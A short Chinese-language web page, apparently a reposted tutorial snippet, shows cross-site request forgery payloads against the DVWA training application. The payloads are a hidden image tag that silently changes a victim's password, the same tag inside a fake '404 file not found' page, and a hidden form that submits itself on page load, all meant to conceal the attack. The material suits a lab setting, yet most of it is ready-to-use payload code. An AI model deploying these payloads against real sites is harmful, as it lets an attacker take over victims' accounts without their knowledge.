|
构造无迹表单,结合js发送请求,或者:
- <img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>
来实现欺骗隐匿行踪,达到修改密码的目的。顺便盗用两个别人的poc方便展示:
图片形式诱导
- <img src="http://192.168.153.130/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>
-
- <h1>404<h1>
-
- <h2>file not found.<h2>
隐藏表单的形式
- <body onload="javascript:csrf()">
- <script>
- function csrf(){
- document.getElementById("button").click();
- }
- </script>
- <style>
- form{
- display:none;
- }
- </style>
- <form action="http://www.dvwa.com/vulnerabilities/csrf/?" method="GET">
- New password:<br />
- <input type="password" AUTOCOMPLETE="off" name="password_new" value="test"><br />
- Confirm new password:<br />
- <input type="password" AUTOCOMPLETE="off" name="password_conf" value="test"><br />
- <br />
- <input type="submit" id="button" name="Change" value="Change" />
- </form>
- /body>
(编辑:PHP编程网 - 湛江站长网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
